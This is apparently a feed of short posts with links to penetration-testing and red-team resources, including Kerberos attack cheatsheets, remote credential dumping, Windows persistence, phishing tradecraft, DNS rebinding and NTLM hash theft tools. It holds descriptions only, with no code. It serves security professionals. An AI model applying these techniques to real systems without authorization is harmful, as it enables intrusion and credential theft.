🇺🇸 Memory Resident Implants Code injection is alive and well at BlueHat v18
Video: https://www.youtube.com/watch?v=02fL2xpR7IM …
Slides: https://www.slideshare.net/MSbluehat/bluehat-v18-memory-resident-implants-code-injection-is-alive-and-well …

#pentest #redteaming #infosec #evasion

Mario & Luigi - Tools for sniffing Windows Named Pipes communication

https://github.com/OmerYa/Named-Pipe-Sniffer
#pentest #infosec

Roll your own Ngrok with Nginx, Letsencrypt, and SSH reverse tunnelling

Ngrok is a fantastic tool for creating a secure tunnel from the public web to a machine behind NAT or a firewall. Sadly, it costs money and it’s proprietary. If you’re a developer, odds are that you’re already renting a server in the public cloud, so why not roll your own ngrok?

https://jerrington.me/posts/2019-01-29-self-hosted-ngrok.html
#pivoting #pentest #redteam

THE DANGER OF EXPOSING DOCKER.SOCK. Exposing /var/run/docker.sock could lead to full environment takeover.

https://dejandayoff.com/the-danger-of-exposing-docker.sock/

#docker #pentest

Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.

https://github.com/nccgroup/singularity
#dns #pentest

Password Spraying- Common mistakes and how to avoid them
When password spraying attacks are executed properly, coordinated and scoped properly during an authorized engagement — they can identify and illustrate the dangers of weak passwords and how extremely dangerous, even one legacy Internet facing endpoint can be.

https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b
#pentest #redteaming

Great collection of my Penetration Testing scripts, tools, cheatsheets collected over years, used during real-world assignments or collected from various good quality sources.

https://github.com/mgeeky/Penetration-Testing-Tools
#cheatsheets #pentest

Next Gen Phishing – Leveraging Azure Information Protection -
How to use Azure Information Protection (AIP) to improve phishing campaigns from the perspective of an attacker

https://www.trustedsec.com/2019/04/next-gen-phishing-leveraging-azure-information-protection/ …

#phishing #azure #pentest #redteam

Vulmap is an open source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also they can be used for privilege escalation by pentesters/red teamers.

https://github.com/vulmon/Vulmap

#scanning #pentest

Penetration Testing (eCPPT) Notes and SOP

https://github.com/TacticThreat/PenetrationTesting-Notes

#cheatsheet #pentest #

Osmedeus - Fully automated offensive security tool for reconnaissance and vulnerability scanning. Osmedeus allows you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target.


https://github.com/j3ssie/Osmedeus
#recon #bugbounty #pentest

Kerberos cheatsheet
A cheatsheet with commands that can be used to perform kerberos attacks:

- Bruteforcing
- ASREPRoast
- Kerberoasting
- Overpass The Hash/Pass The Key (PTK)
- Pass The Ticket (PTT)
- Silver / Golden ticket

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
#pentest #redteaming #kerberos #windows #ad

Check-LocalAdminHash
Check-LocalAdminHash is a PowerShell tool that attempts to authenticate to multiple hosts over either WMI or SMB using a password hash to determine if the provided credential is a local administrator. It's useful if you obtain a password hash for a user and want to see where they are local admin on a network. It is essentially a Frankenstein of two of my favorite tools along with some of my own code.

https://github.com/dafthack/Check-LocalAdminHash
#redteaming #pentest #ad #windows

Docker for Pentesters

My hope in this post is to demonstrate some of my usecases and workflows, and illustrate how I think pentesters and security professionals in general can greatly benefit from Docker.

https://blog.ropnop.com/docker-for-pentesters/

#docker #pentest

pwn_jenkins
Notes about attacking Jenkins servers

https://github.com/gquere/pwn_jenkins
#jenkins #pentest

Python for Pentesters

Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started.

https://github.com/ustayready/python-pentesting
#python #tools #pentest

Extracting credentials from a remote Windows system - Living off the Land

Recently we performed a red teaming engagement where we wanted to dump the credentials from a remote host. We got the credentials of a user which has administrative privileges on the victim host and wanted to get more credentials from that host. Because we felt that the blue team was closely observing the environment this needed to be done in a stealthy manner and preferably only involving native Windows tooling. That is when we came up with the following approach in order to obtain a remote system’s SYSTEM, SECURITY and SAM files from %SystemRoot%\System32\Config making use of WMI and SMB. This approach can also be used to obtain the ntds.dit file from a Domain Controller in order to obtain the credentials of the complete organization.

https://bitsadm.in/blog/extracting-credentials-from-remote-windows-system
#windows #redteaming #pentest #evasion

Attacking Active Directory Group Managed Service Accounts (GMSAs)

User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed. This means that the GMSA has to have security principals explicitly delegated to have access to the clear-text password. This is where it can get tricky.

https://adsecurity.org/?p=4367
#ad #windows #pentest

ABUSING WINDOWS TELEMETRY FOR PERSISTENCE

Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade. The process outlined here affects Windows machines from 2008R2/Windows 7 through 2019/Windows 10.

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
#windows #persitence #redteaming #pentest

ntlm_theft: A file payload generator for forced ntlm hash disclosure

Greetings fellow security enthusiast! Today I want to introduce you to a new security tool I’ve written called ntlm_theft, which is now available on GitHub. It’s a tool which generates a number of known filetypes (18 at time of writing), which can be used by an attacker to trick users into disclosing their NetNTLMv2 hashes.

> https://medium.com/greenwolf-security/ntlm-theft-a-file-payload-generator-for-forced-ntlm-hash-disclosure-2d5f1fe5b964
> https://github.com/Greenwolf/ntlm_theft

#windows #ntlm #tools #pentest